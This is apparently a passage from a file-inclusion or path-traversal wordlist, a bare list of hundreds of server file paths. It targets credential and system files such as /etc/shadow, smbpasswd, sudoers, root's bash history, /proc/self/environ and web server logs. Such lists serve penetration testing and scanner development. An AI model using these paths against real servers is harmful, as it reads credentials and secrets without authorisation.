-/etc/muddleftpd.com
-/etc/muddleftpd/muddleftpd.conf
-/etc/muddleftpd/muddleftpd.passwd
-/etc/muddleftpd/mudlog
-/etc/muddleftpd/mudlogd.conf
-/etc/muddleftpd/passwd
-/etc/my.cnf
-/etc/mysql/my.cnf
-/etc/networks
-/etc/nginx/nginx.conf
-/etc/openldap/ldap.conf
-/etc/os-release
-/etc/osxhttpd/osxhttpd.conf
-/etc/pam.conf
-/etc/passwd
-/etc/passwd-
-/etc/passwd~
-/etc/password.master
-/etc/php4/apache2/php.ini
-/etc/php4/apache/php.ini
-/etc/php4/cgi/php.ini
-/etc/php5/apache2/php.ini
-/etc/php5/apache/php.ini
-/etc/php5/cgi/php.ini
-/etc/php/apache2/php.ini
-/etc/php/apache/php.ini
-/etc/php/cgi/php.ini
-/etc/php.ini
-/etc/phpmyadmin/config.inc.php
-/etc/php/php4/php.ini
-/etc/php/php.ini
-/etc/postgresql/pg_hba.conf
-/etc/postgresql/postgresql.conf
-/etc/profile
-/etc/proftp.conf
-/etc/proftpd/modules.conf
-/etc/protpd/proftpd.conf
-/etc/pulse/client.conf
-/etc/pure-ftpd.conf
-/etc/pureftpd.passwd
-/etc/pureftpd.pdb
-/etc/pure-ftpd/pure-ftpd.conf
-/etc/pure-ftpd/pure-ftpd.pdb
-/etc/pure-ftpd/pureftpd.pdb
-/etc/rc.conf
-/etc/redhat-release
-/etc/resolv.conf
-/etc/samba/dhcp.conf
-/etc/samba/netlogon
-/etc/samba/private/smbpasswd
-/etc/samba/samba.conf
-/etc/samba/smb.conf
-/etc/samba/smb.conf.user
-/etc/samba/smbpasswd
-/etc/samba/smbusers
-/etc/security/access.conf
-/etc/security/environ
-/etc/security/failedlogin
-/etc/security/group
-/etc/security/group.conf
-/etc/security/lastlog
-/etc/security/limits
-/etc/security/limits.conf
-/etc/security/namespace.conf
-/etc/security/opasswd
-/etc/security/pam_env.conf
-/etc/security/passwd
-/etc/security/passwd
-/etc/security/sepermit.conf
-/etc/security/time.conf
-/etc/security/user
-/etc/sensors3.conf
-/etc/sensors.conf
-/etc/shadow
-/etc/shadow-
-/etc/shadow~
-/etc/slackware-release
-/etc/smb.conf
-/etc/smbpasswd
-/etc/smi.conf
-/etc/squirrelmail/apache.conf
-/etc/squirrelmail/config/config.php
-/etc/squirrelmail/config_default.php
-/etc/squirrelmail/config_local.php
-/etc/squirrelmail/config.php
-/etc/squirrelmail/default_pref
-/etc/squirrelmail/filters_setup.php
-/etc/squirrelmail/index.php
-/etc/squirrelmail/sqspell_config.php
-/etc/ssh/sshd_config
-/etc/sso/sso_config.ini
-/etc/stunnel/stunnel.conf
-/etc/sudoers
-/etc/SUSE-release
-/etc/sysconfig/network-scripts/ifcfg-eth0
-/etc/sysctl.conf
-/etc/syslog.conf
-/etc/timezone
-/etc/tinyproxy/tinyproxy.conf
-/etc/tor/tor-tsocks.conf
-/etc/tsocks.conf
-/etc/updatedb.conf
-/etc/updatedb.conf.BeforeVMwareToolsInstall
-/etc/utmp
-/etc/vhcs2/proftpd/proftpd.conf
-/etc/vmware-tools/config
-/etc/vmware-tools/tpvmlp.conf
-/etc/vmware-tools/vmware-tools-libraries.conf
-/etc/vsftpd.chroot_list
-/etc/vsftpd.conf
-/etc/vsftpd/vsftpd.conf
-/etc/webmin/miniserv.conf
-/etc/webmin/miniserv.users
-/etc/wicd/dhclient.conf.template.default
-/etc/wicd/manager-settings.conf
-/etc/wicd/wired-settings.conf
-/etc/wicd/wireless-settings.conf
-/etc/wu-ftpd/ftpaccess
-/etc/wu-ftpd/ftphosts
-/etc/wu-ftpd/ftpusers
-/etc/X11/xorg.conf
-/etc/X11/xorg.conf.BeforeVMwareToolsInstall
-/etc/X11/xorg.conf.orig
-/etc/X11/xorg.conf-vesa
-/etc/X11/xorg.conf-vmware
-/home2/bin/stable/apache/php.ini
-/home2\bin\stable\apache\php.ini
-/home/bin/stable/apache/php.ini
-/home\bin\stable\apache\php.ini
-/home/postgres/data/pg_hba.conf
-/home/postgres/data/pg_ident.conf
-/home/postgres/data/PG_VERSION
-/home/postgres/data/postgresql.conf
-/home/user/lighttpd/lighttpd.conf
-/http/httpd.conf
-/[JBOSS]/server/default/conf/jboss-minimal.xml
-/[JBOSS]/server/default/conf/jboss-service.xml
-/[JBOSS]/server/default/conf/jndi.properties
-/[JBOSS]/server/default/conf/log4j.xml
-/[JBOSS]/server/default/conf/login-config.xml
-/[JBOSS]/server/default/conf/server.log.properties
-/[JBOSS]/server/default/conf/standardjaws.xml
-/[JBOSS]/server/default/conf/standardjboss.xml
-/[JBOSS]/server/default/deploy/jboss-logging.xml
-/[JBOSS]/server/default/log/boot.log
-/[JBOSS]/server/default/log/server.log
-/Library/WebServer/Documents/default.htm
-/Library/WebServer/Documents/default.html
-/Library/WebServer/Documents/default.php
-/Library/WebServer/Documents/.htaccess
-/Library/WebServer/Documents/index.htm
-/Library/WebServer/Documents/index.html
-/Library/WebServer/Documents/index.php
-/logs/access.log
-/logs/access_log
-/logs/error.log
-/logs/error_log
-/logs/pure-ftpd.log
-/logs/security_debug_log
-/logs/security_log
-/mysql/bin/my.ini
-/MySQL/data/{HOST}.err
-/MySQL/data/mysql-bin.index
-/MySQL/data/mysql-bin.log
-/MySQL/data/mysql.err
-/MySQL/data/mysql.log
-/MySQL/my.cnf
-/MySQL/my.ini
-/NetServer/bin/stable/apache/php.ini
-/NetServer\bin\stable\apache\php.ini
-/opt/apache22/conf/httpd.conf
-/opt/apache2/apache2.conf
-/opt/apache2/apache.conf
-/opt/apache2/conf/apache2.conf
-/opt/apache2/conf/apache.conf
-/opt/apache2/conf/httpd.conf
-/opt/apache/apache2.conf
-/opt/apache/apache.conf
-/opt/apache/conf/apache2.conf
-/opt/apache/conf/apache.conf
-/opt/apache/conf/httpd.conf
-/opt/httpd/apache2.conf
-/opt/httpd/apache.conf
-/opt/httpd/conf/apache2.conf
-/opt/httpd/conf/apache.conf
-/opt/[JBOSS]/server/default/conf/jboss-minimal.xml
-/opt/[JBOSS]/server/default/conf/jboss-service.xml
-/opt/[JBOSS]/server/default/conf/jndi.properties
-/opt/[JBOSS]/server/default/conf/log4j.xml
-/opt/[JBOSS]/server/default/conf/login-config.xml
-/opt/[JBOSS]/server/default/conf/server.log.properties
-/opt/[JBOSS]/server/default/conf/standardjaws.xml
-/opt/[JBOSS]/server/default/conf/standardjboss.xml
-/opt/[JBOSS]/server/default/deploy/jboss-logging.xml
-/opt/[JBOSS]/server/default/log/boot.log
-/opt/[JBOSS]/server/default/log/server.log
-/opt/lampp/etc/httpd.conf
-/opt/lampp/logs/access.log
-/opt/lampp/logs/access_log
-/opt/lampp/logs/error.log
-/opt/lampp/logs/error_log
-/opt/lsws/conf/httpd_conf.xml
-/opt/lsws/logs/access.log
-/opt/lsws/logs/error.log
-/opt/tomcat/logs/catalina.err
-/opt/tomcat/logs/catalina.out
-/opt/xampp/etc/php.ini
-/opt/xampp/logs/access.log
-/opt/xampp/logs/access_log
-/opt/xampp/logs/error.log
-/opt/xampp/logs/error_log
-/private/etc/httpd/apache2.conf
-/private/etc/httpd/apache.conf
-/private/etc/httpd/httpd.conf
-/private/etc/httpd/httpd.conf.default
-/private/etc/squirrelmail/config/config.php
-/private/tmp/[JBOSS]/server/default/conf/jboss-minimal.xml
-/private/tmp/[JBOSS]/server/default/conf/jboss-service.xml
-/private/tmp/[JBOSS]/server/default/conf/jndi.properties
-/private/tmp/[JBOSS]/server/default/conf/log4j.xml
-/private/tmp/[JBOSS]/server/default/conf/login-config.xml
-/private/tmp/[JBOSS]/server/default/conf/server.log.properties
-/private/tmp/[JBOSS]/server/default/conf/standardjaws.xml
-/private/tmp/[JBOSS]/server/default/conf/standardjboss.xml
-/private/tmp/[JBOSS]/server/default/deploy/jboss-logging.xml
-/private/tmp/[JBOSS]/server/default/log/boot.log
-/private/tmp/[JBOSS]/server/default/log/server.log
-/proc/cpuinfo
-/proc/devices
-/proc/meminfo
-/proc/net/tcp
-/proc/net/udp
-/proc/self/cmdline
-/proc/self/environ
-/proc/self/mounts
-/proc/self/stat
-/proc/self/status
-/proc/version
-/Program Files/Apache Group/Apache2/conf/apache2.conf
-/Program Files/Apache Group/Apache2/conf/apache.conf
-/Program Files/Apache Group/Apache2/conf/httpd.conf
-/Program Files\Apache Group\Apache2\conf\httpd.conf
-/Program Files/Apache Group/Apache/apache2.conf
-/Program Files/Apache Group/Apache/apache.conf
-/Program Files/Apache Group/Apache/conf/apache2.conf
-/Program Files/Apache Group/Apache/conf/apache.conf
-/Program Files/Apache Group/Apache/conf/httpd.conf
-/Program Files\Apache Group\Apache\conf\httpd.conf
-/Program Files/Apache Group/Apache/logs/access.log
-/Program Files\Apache Group\Apache\logs\access.log
-/Program Files/Apache Group/Apache/logs/error.log
-/Program Files\Apache Group\Apache\logs\error.log
-/Program Files/[JBOSS]/server/default/conf/jboss-minimal.xml
-/Program Files/[JBOSS]/server/default/conf/jboss-service.xml
-/Program Files/[JBOSS]/server/default/conf/jndi.properties
-/Program Files/[JBOSS]/server/default/conf/log4j.xml
-/Program Files/[JBOSS]/server/default/conf/login-config.xml
-/Program Files/[JBOSS]/server/default/conf/server.log.properties
-/Program Files/[JBOSS]/server/default/conf/standardjaws.xml
-/Program Files/[JBOSS]/server/default/conf/standardjboss.xml
-/Program Files/[JBOSS]/server/default/deploy/jboss-logging.xml
-/Program Files/[JBOSS]/server/default/log/boot.log
-/Program Files/[JBOSS]/server/default/log/server.log
-/Program Files/MySQL/data/{HOST}.err
-/Program Files/MySQL/data/mysql-bin.index
-/Program Files/MySQL/data/mysql-bin.log
-/Program Files/MySQL/data/mysql.err
-/Program Files/MySQL/data/mysql.log
-/Program Files/MySQL/my.cnf
-/Program Files/MySQL/my.ini
-/Program Files/Vidalia Bundle/Polipo/polipo.conf
-/Program Files/xampp/apache/conf/apache2.conf
-/Program Files/xampp/apache/conf/apache.conf
-/Program Files/xampp/apache/conf/httpd.conf
-/Program Files\xampp\apache\conf\httpd.conf
-/root/.bash_config
-/root/.bash_history
-/root/.bash_logout
-/root/.bashrc
-/root/.ksh_history
-/root/.Xauthority
-/srv/www/htdos/squirrelmail/config/config.php
-/tmp/access.log
-/tmp/[JBOSS]/server/default/conf/jboss-minimal.xml
-/tmp/[JBOSS]/server/default/conf/jboss-service.xml
-/tmp/[JBOSS]/server/default/conf/jndi.properties
-/tmp/[JBOSS]/server/default/conf/log4j.xml
-/tmp/[JBOSS]/server/default/conf/login-config.xml
-/tmp/[JBOSS]/server/default/conf/server.log.properties
-/tmp/[JBOSS]/server/default/conf/standardjaws.xml
-/tmp/[JBOSS]/server/default/conf/standardjboss.xml
-/tmp/[JBOSS]/server/default/deploy/jboss-logging.xml
-/tmp/[JBOSS]/server/default/log/boot.log
-/tmp/[JBOSS]/server/default/log/server.log
-/usr/apache2/conf/httpd.conf
-/usr/apache/conf/httpd.conf
-/usr/etc/pure-ftpd.conf
-/usr/home/user/lighttpd/lighttpd.conf
-/usr/home/user/var/log/apache.log
-/usr/home/user/var/log/lighttpd.error.log
-/usr/internet/pgsql/data/pg_hba.conf
-/usr/internet/pgsql/data/postmaster.log
-/usr/lib/cron/log
-/usr/lib/php.ini
-/usr/lib/php/php.ini
-/usr/lib/security/mkuser.default
-/usr/local/apache22/conf/httpd.conf
-/usr/local/apache22/httpd.conf
-/usr/local/apache2/apache2.conf
-/usr/local/apache2/apache.conf
-/usr/local/apache2/conf/apache2.conf
-/usr/local/apache2/conf/apache.conf
-/usr/local/apache2/conf/extra/httpd-ssl.conf
-/usr/local/apache2/conf/httpd.conf
-/usr/local/apache2/conf/modsec.conf
-/usr/local/apache2/conf/ssl.conf
-/usr/local/apache2/conf/vhosts.conf
-/usr/local/apache2/conf/vhosts-custom.conf
-/usr/local/apache2/httpd.conf
-/usr/local/apache2/logs/access.log
-/usr/local/apache2/logs/access_log
-/usr/local/apache2/logs/audit_log
-/usr/local/apache2/logs/error.log
-/usr/local/apache2/logs/error_log
-/usr/local/apache2/logs/lighttpd.error.log
-/usr/local/apache2/logs/lighttpd.log
-/usr/local/apache/apache2.conf
-/usr/local/apache/apache.conf
-/usr/local/apache/conf/access.conf
-/usr/local/apache/conf/apache2.conf
-/usr/local/apache/conf/apache.conf
-/usr/local/apache/conf/httpd.conf
-/usr/local/apache/conf/httpd.conf.default
-/usr/local/apache/conf/modsec.conf
-/usr/local/apache/conf/php.ini
-/usr/local/apache/conf/vhosts.conf
-/usr/local/apache/conf/vhosts-custom.conf
-/usr/local/apache/httpd.conf
-/usr/local/apache/logs/access.log
-/usr/local/apache/logs/access_log
-/usr/local/apache/logs/audit_log
-/usr/local/apache/logs/error.log
-/usr/local/apache/logs/error_log
-/usr/local/apache/logs/lighttpd.error.log
-/usr/local/apache/logs/lighttpd.log
-/usr/local/apache/logs/mod_jk.log
-/usr/local/apps/apache22/conf/httpd.conf
-/usr/local/apps/apache2/conf/httpd.conf
-/usr/local/apps/apache/conf/httpd.conf
-/usr/local/cpanel/logs
-/usr/local/cpanel/logs/access_log
-/usr/local/cpanel/logs/error_log
-/usr/local/cpanel/logs/license_log
-/usr/local/cpanel/logs/login_log
-/usr/local/cpanel/logs/stats_log
-/usr/local/etc/apache22/conf/httpd.conf
-/usr/local/etc/apache22/httpd.conf
-/usr/local/etc/apache2/conf/httpd.conf
-/usr/local/etc/apache2/httpd.conf
-/usr/local/etc/apache2/vhosts.conf
-/usr/local/etc/apache/conf/httpd.conf
-/usr/local/etc/apache/httpd.conf
-/usr/local/etc/apache/vhosts.conf
-/usr/local/etc/httpd/conf
-/usr/local/etc/httpd/conf/httpd.conf
-/usr/local/etc/lighttpd.conf
-/usr/local/etc/lighttpd.conf.new
-/usr/local/etc/nginx/nginx.conf
-/usr/local/etc/php.ini
-/usr/local/etc/pure-ftpd.conf
-/usr/local/etc/pureftpd.pdb
-/usr/local/etc/smb.conf
-/usr/local/etc/webmin/miniserv.conf
-/usr/local/etc/webmin/miniserv.users
-/usr/local/httpd/conf/httpd.conf
-/usr/local/jakarta/dist/tomcat/conf/context.xml
-/usr/local/jakarta/dist/tomcat/conf/jakarta.conf
-/usr/local/jakarta/dist/tomcat/conf/logging.properties
-/usr/local/jakarta/dist/tomcat/conf/server.xml
-/usr/local/jakarta/dist/tomcat/conf/workers.properties
-/usr/local/jakarta/dist/tomcat/logs/mod_jk.log
-/usr/local/jakarta/tomcat/conf/context.xml
-/usr/local/jakarta/tomcat/conf/jakarta.conf
-/usr/local/jakarta/tomcat/conf/logging.properties
-/usr/local/jakarta/tomcat/conf/server.xml
-/usr/local/jakarta/tomcat/conf/workers.properties
-/usr/local/jakarta/tomcat/logs/catalina.err
-/usr/local/jakarta/tomcat/logs/catalina.out
-/usr/local/jakarta/tomcat/logs/mod_jk.log
-/usr/local/[JBOSS]/server/default/conf/jboss-minimal.xml
-/usr/local/[JBOSS]/server/default/conf/jboss-service.xml
-/usr/local/[JBOSS]/server/default/conf/jndi.properties
-/usr/local/[JBOSS]/server/default/conf/log4j.xml
-/usr/local/[JBOSS]/server/default/conf/login-config.xml
-/usr/local/[JBOSS]/server/default/conf/server.log.properties
-/usr/local/[JBOSS]/server/default/conf/standardjaws.xml
-/usr/local/[JBOSS]/server/default/conf/standardjboss.xml
-/usr/local/[JBOSS]/server/default/deploy/jboss-logging.xml
-/usr/local/[JBOSS]/server/default/log/boot.log
-/usr/local/[JBOSS]/server/default/log/server.log
-/usr/local/lib/php.ini
-/usr/local/lighttpd/conf/lighttpd.conf
-/usr/local/lighttpd/log/access.log
-/usr/local/lighttpd/log/lighttpd.error.log
-/usr/local/logs/access.log
-/usr/local/logs/samba.log
-/usr/local/lsws/conf/httpd_conf.xml
-/usr/local/lsws/logs/error.log
-/usr/local/mysql/data/{HOST}.err
-/usr/local/mysql/data/mysql-bin.index
-/usr/local/mysql/data/mysql-bin.log
-/usr/local/mysql/data/mysqlderror.log
-/usr/local/mysql/data/mysql.err
-/usr/local/mysql/data/mysql.log
-/usr/local/mysql/data/mysql-slow.log
-/usr/local/nginx/conf/nginx.conf
-/usr/local/pgsql/bin/pg_passwd
-/usr/local/pgsql/data/passwd
-/usr/local/pgsql/data/pg_hba.conf
-/usr/local/pgsql/data/pg_log
-/usr/local/pgsql/data/postgresql.conf
-/usr/local/pgsql/data/postgresql.log
-/usr/local/php4/apache2.conf
-/usr/local/php4/apache2.conf.php
-/usr/local/php4/apache.conf
-/usr/local/php4/apache.conf.php
-/usr/local/php4/httpd.conf
-/usr/local/php4/httpd.conf.php
-/usr/local/php4/lib/php.ini
-/usr/local/php5/apache2.conf
-/usr/local/php5/apache2.conf.php
-/usr/local/php5/apache.conf
-/usr/local/php5/apache.conf.php
-/usr/local/php5/httpd.conf
-/usr/local/php5/httpd.conf.php
-/usr/local/php5/lib/php.ini
-/usr/local/php/apache2.conf
-/usr/local/php/apache2.conf.php
-/usr/local/php/apache.conf
-/usr/local/php/apache.conf.php
-/usr/local/php/httpd.conf
-/usr/local/php/httpd.conf.php
-/usr/local/php/lib/php.ini
-/usr/local/psa/admin/conf/php.ini
-/usr/local/psa/admin/conf/site_isolation_settings.ini
-/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php
-/usr/local/psa/admin/logs/httpsd_access_log
-/usr/local/psa/admin/logs/panel.log
-/usr/local/pureftpd/etc/pure-ftpd.conf
-/usr/local/pureftpd/etc/pureftpd.pdb
-/usr/local/pureftpd/sbin/pure-config.pl
-/usr/local/samba/lib/log.user
-/usr/local/samba/lib/smb.conf.user
-/usr/local/sb/config
-/usr/local/Zend/etc/php.ini
-/usr/local/zeus/web/global.cfg
-/usr/local/zeus/web/log/errors
-/usr/pkg/etc/httpd/httpd.conf
-/usr/pkg/etc/httpd/httpd-default.conf
-/usr/pkg/etc/httpd/httpd-vhosts.conf
-/usr/pkgsrc/net/pureftpd/
-/usr/pkgsrc/net/pureftpd/pure-ftpd.conf
-/usr/pkgsrc/net/pureftpd/pureftpd.passwd
-/usr/pkgsrc/net/pureftpd/pureftpd.pdb
-/usr/ports/contrib/pure-ftpd/
-/usr/ports/contrib/pure-ftpd/pure-ftpd.conf
-/usr/ports/contrib/pure-ftpd/pureftpd.passwd
-/usr/ports/contrib/pure-ftpd/pureftpd.pdb
-/usr/ports/ftp/pure-ftpd/
-/usr/ports/ftp/pure-ftpd/pure-ftpd.conf
-/usr/ports/ftp/pure-ftpd/pureftpd.passwd
-/usr/ports/ftp/pure-ftpd/pureftpd.pdb
-/usr/ports/net/pure-ftpd/
-/usr/ports/net/pure-ftpd/pure-ftpd.conf
-/usr/ports/net/pure-ftpd/pureftpd.passwd
-/usr/ports/net/pure-ftpd/pureftpd.pdb
-/usr/sbin/mudlogd
-/usr/sbin/mudpasswd
-/usr/sbin/pure-config.pl
-/usr/share/adduser/adduser.conf
-/usr/share/logs/catalina.err
-/usr/share/logs/catalina.out
-/usr/share/squirrelmail/config/config.php
-/usr/share/squirrelmail/plugins/squirrel_logger/setup.php
-/usr/share/tomcat6/conf/context.xml
-/usr/share/tomcat6/conf/logging.properties
-/usr/share/tomcat6/conf/server.xml
-/usr/share/tomcat6/conf/workers.properties
-/usr/share/tomcat6/logs/catalina.err
-/usr/share/tomcat6/logs/catalina.out
-/usr/share/tomcat/logs/catalina.err
-/usr/share/tomcat/logs/catalina.out
-/usr/spool/lp/log
-/usr/spool/mqueue/syslog
-/var/adm/acct/sum/loginlog
-/var/adm/aculog
-/var/adm/aculogs
-/var/adm/crash/unix
-/var/adm/crash/vmcore
-/var/adm/cron/log
-/var/adm/dtmp
-/var/adm/lastlog/username
-/var/adm/log/asppp.log
-/var/adm/loginlog
-/var/adm/log/xferlog
-/var/adm/lp/lpd-errs
-/var/adm/messages
-/var/adm/pacct
-/var/adm/qacct
-/var/adm/ras/bootlog
-/var/adm/ras/errlog
-/var/adm/sulog
-/var/adm/SYSLOG
-/var/adm/utmp
-/var/adm/utmpx
-/var/adm/vold.log
-/var/adm/wtmp
-/var/adm/wtmpx
-/var/adm/X0msgs
-/var/apache/conf/httpd.conf
-/var/cpanel/cpanel.config
-/var/cpanel/tomcat.options
-/var/cron/log
-/var/data/mysql-bin.index
-/var/lib/mysql/my.cnf
-/var/lib/pgsql/data/postgresql.conf
-/var/lib/squirrelmail/prefs/squirrelmail.log
-/var/lighttpd.log
-/var/local/www/conf/php.ini
-/var/log/access.log
-/var/log/access_log
-/var/log/apache2/access.log
-/var/log/apache2/access_log
-/var/log/apache2/error.log
-/var/log/apache2/error_log
-/var/log/apache2/squirrelmail.err.log
-/var/log/apache2/squirrelmail.log
-/var/log/apache/access.log
-/var/log/apache/access_log
-/var/log/apache/error.log
-/var/log/apache/error_log
-/var/log/auth.log
-/var/log/authlog
-/var/log/boot.log
-/var/log/cron/var/log/postgres.log
-/var/log/daemon.log
-/var/log/daemon.log.1
-/var/log/data/mysql-bin.index
-/var/log/dmessage
-/var/log/error.log
-/var/log/error_log
-/var/log/exim/mainlog
-/var/log/exim_mainlog
-/var/log/exim/paniclog
-/var/log/exim_paniclog
-/var/log/exim/rejectlog
-/var/log/exim_rejectlog
-/var/log/ftplog
-/var/log/ftp-proxy
-/var/log/ftp-proxy/ftp-proxy.log
-/var/log/httpd-access.log
-/var/log/httpd/access.log
-/var/log/httpd/access_log
-/var/log/httpd/error.log
-/var/log/httpd/error_log
-/var/log/ipfw
-/var/log/ipfw/ipfw.log
-/var/log/ipfw.log
-/var/log/ipfw.today
-/var/log/kern.log
-/var/log/kern.log.1
-/var/log/lighttpd/
-/var/log/lighttpd.access.log
-/var/log/lighttpd/access.log
-/var/log/lighttpd/access.www.log
-/var/log/lighttpd/{DOMAIN}/access.log
-/var/log/lighttpd/{DOMAIN}/error.log
-/var/log/lighttpd.error.log
-/var/log/lighttpd/error.log
-/var/log/lighttpd/error.www.log
-/var/log/log.smb
-/var/log/mail.err
-/var/log/mail.info
-/var/log/mail.log
-/var/log/maillog
-/var/log/mail.warn
-/var/log/messages
-/var/log/messages.1
-/var/log/muddleftpd
-/var/log/muddleftpd.conf
-/var/log/mysql-bin.index
-/var/log/mysql/data/mysql-bin.index
-/var/log/mysqlderror.log
-/var/log/mysql.err
-/var/log/mysql.log
-/var/log/mysql/mysql-bin.index
-/var/log/mysql/mysql-bin.log
-/var/log/mysql/mysql.log
-/var/log/mysql/mysql-slow.log
-/var/log/news.all
-/var/log/news/news.all
-/var/log/news/news.crit
-/var/log/news/news.err
-/var/log/news/news.notice
-/var/log/news/suck.err
-/var/log/news/suck.notice
-/var/log/nginx.access_log
-/var/log/nginx/access.log
-/var/log/nginx/access_log
-/var/log/nginx.error_log
-/var/log/nginx/error.log
-/var/log/nginx/error_log
-/var/log/pgsql8.log
-/var/log/pgsql_log
-/var/log/pgsql/pgsql.log
-/var/log/pm-powersave.log
-/var/log/POPlog
-/var/log/postgres/pg_backup.log
-/var/log/postgres/postgres.log
-/var/log/postgresql.log
-/var/log/postgresql/main.log
-/var/log/postgresql/postgres.log
-/var/log/postgresql/postgresql-8.1-main.log
-/var/log/postgresql/postgresql-8.3-main.log
-/var/log/postgresql/postgresql-8.4-main.log
-/var/log/postgresql/postgresql-9.0-main.log
-/var/log/postgresql/postgresql-9.1-main.log
-/var/log/postgresql/postgresql.log
-/var/log/proftpd
-/var/log/proftpd.access_log
-/var/log/proftpd.xferlog
-/var/log/proftpd/xferlog.legacy
-/var/log/pureftpd.log
-/var/log/pure-ftpd/pure-ftpd.log
-/var/logs/access.log
-/var/log/samba.log
-/var/log/samba.log1
-/var/log/samba.log2
-/var/log/samba/log.nmbd
-/var/log/samba/log.smbd
-/var/log/squirrelmail.log
-/var/log/sso/sso.log
-/var/log/sw-cp-server/error_log
-/var/log/syslog
-/var/log/syslog.1
-/var/log/tomcat6/catalina.out
-/var/log/ufw.log
-/var/log/user.log
-/var/log/user.log.1
-/var/log/vmware/hostd-1.log
-/var/log/vmware/hostd.log
-/var/log/vsftpd.log
-/var/log/webmin/miniserv.log
-/var/log/xferlog
-/var/log/Xorg.0.log
-/var/lp/logs/lpNet
-/var/lp/logs/lpsched
-/var/lp/logs/requests
-/var/mail/root
-/var/mysql-bin.index
-/var/mysql.log
-/var/nm2/postgresql.conf
-/var/postgresql/db/postgresql.conf
-/var/postgresql/log/postgresql.log
-/var/saf/_log
-/var/saf/port/log
-/var/spool/cron/crontabs/root
-/var/spool/cron/crontabs/root
-/var/www/conf
-/var/www/conf/httpd.conf
-/var/www/html/squirrelmail/config/config.php
-/var/www/.lighttpdpassword
-/var/www/logs/access.log
-/var/www/logs/access_log
-/var/www/logs/error.log
-/var/www/logs/error_log
-/var/www/squirrelmail/config/config.php
-/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
-/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
-/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
-/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
-/Volumes/webBackup/opt/apache2/conf/httpd.conf
-/Volumes/webBackup/private/etc/httpd/httpd.conf
-/Volumes/webBackup/private/etc/httpd/httpd.conf.default
-/wamp/bin/apache/apache2.2.21/conf/httpd.conf
-/wamp/bin/apache/apache2.2.21/logs/access.log
-/wamp/bin/apache/apache2.2.21/logs/error.log
-/wamp/bin/apache/apache2.2.21/wampserver.conf
-/wamp/bin/apache/apache2.2.22/conf/httpd.conf
-/wamp/bin/apache/apache2.2.22/conf/wampserver.conf
-/wamp/bin/apache/apache2.2.22/logs/access.log
-/wamp/bin/apache/apache2.2.22/logs/error.log
-/wamp/bin/apache/apache2.2.22/wampserver.conf
-/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index
-/wamp/bin/mysql/mysql5.5.16/my.ini
-/wamp/bin/mysql/mysql5.5.16/wampserver.conf
-/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index
-/wamp/bin/mysql/mysql5.5.24/my.ini
-/wamp/bin/mysql/mysql5.5.24/wampserver.conf
-/wamp/logs/access.log
-/wamp/logs/apache_error.log
-/wamp/logs/genquery.log
-/wamp/logs/mysql.log
-/wamp/logs/slowquery.log
-/web/conf/php.ini
-/WINDOWS/php.ini
-/WINDOWS\php.ini
-/WINDOWS/system32/logfiles/MSFTPSVC
-/WINDOWS/system32/logfiles/MSFTPSVC1
-/WINDOWS/system32/logfiles/MSFTPSVC2
-/WINDOWS/system32/logfiles/SMTPSVC
-/WINDOWS/system32/logfiles/SMTPSVC1
-/WINDOWS/system32/logfiles/SMTPSVC2
-/WINDOWS/system32/logfiles/SMTPSVC3
-/WINDOWS/system32/logfiles/SMTPSVC4
-/WINDOWS/system32/logfiles/SMTPSVC5
-/WINDOWS/system32/logfiles/W3SVC1/inetsvn1.log
-/WINDOWS/system32/logfiles/W3SVC2/inetsvn1.log
-/WINDOWS/system32/logfiles/W3SVC3/inetsvn1.log
-/WINDOWS/system32/logfiles/W3SVC/inetsvn1.log
-/WINNT/php.ini
-/WINNT\php.ini
-/WINNT/system32/logfiles/MSFTPSVC
-/WINNT/system32/logfiles/MSFTPSVC1
-/WINNT/system32/logfiles/MSFTPSVC2
-/WINNT/system32/logfiles/SMTPSVC
-/WINNT/system32/logfiles/SMTPSVC1
-/WINNT/system32/logfiles/SMTPSVC2
-/WINNT/system32/logfiles/SMTPSVC3
-/WINNT/system32/logfiles/SMTPSVC4
-/WINNT/system32/logfiles/SMTPSVC5
-/WINNT/system32/logfiles/W3SVC1/inetsvn1.log
-/WINNT/system32/logfiles/W3SVC2/inetsvn1.log
-/WINNT/system32/logfiles/W3SVC3/inetsvn1.log
-/WINNT/system32/logfiles/W3SVC/inetsvn1.log
-/www/apache/conf/httpd.conf
-/www/conf/httpd.conf
-/www/logs/freebsddiary-access_log
-/www/logs/freebsddiary-error.log
-/www/logs/proftpd.system.log
-/xampp/apache/bin/php.ini
-/xampp\apache\bin\php.ini
-/xampp/apache/conf/httpd.conf
-/xampp/apache/logs/access.log
-/xampp/apache/logs/error.log
-/xampp/FileZillaFTP/FileZilla Server.xml
-/xampp/htdocs/aca.txt
-/xampp/htdocs/admin.php
-/xampp/htdocs/leer.txt
-/xampp/MercuryMail/mercury.ini
-/xampp/mysql/data/{HOST}.err
-/xampp/mysql/data/mysql-bin.index
-/xampp/mysql/data/mysql.err
-/xampp/phpMyAdmin/config.inc.php
-/xampp/php/php.ini
-/xampp/sendmail/sendmail.ini
-/xampp/sendmail/sendmail.log
-/xampp/webalizer/webalizer.conf
-/proc/self/fd/0
-/proc/self/fd/1
-/proc/self/fd/2
-/proc/self/fd/3
-/proc/self/fd/4
-/proc/self/fd/5
-/proc/self/fd/6
-/proc/self/fd/7
-/proc/self/fd/8
-/proc/self/fd/9
-/proc/self/fd/10
-/proc/self/fd/11
-/proc/self/fd/12
-/proc/self/fd/13
-/proc/self/fd/14
-/proc/self/fd/15
-/proc/self/fd/16
-/proc/self/fd/17
-/proc/self/fd/18
-/proc/self/fd/19
-/proc/self/fd/20
-/proc/self/fd/21
-/proc/self/fd/22
-/proc/self/fd/23
-/proc/self/fd/24
-/proc/self/fd/25
-/proc/self/fd/26
-/proc/self/fd/27
-/proc/self/fd/28
-/proc/self/fd/29
-/proc/self/fd/30
-/proc/self/fd/31
-/proc/self/fd/32
-/proc/self/fd/33
-/proc/self/fd/34
-/proc/self/fd/35
-/proc/self/fd/36
-/proc/self/fd/37
-/proc/self/fd/38
-/proc/self/fd/39
-/proc/self/fd/40
-/proc/self/fd/41
-/proc/self/fd/42
-/proc/self/fd/43
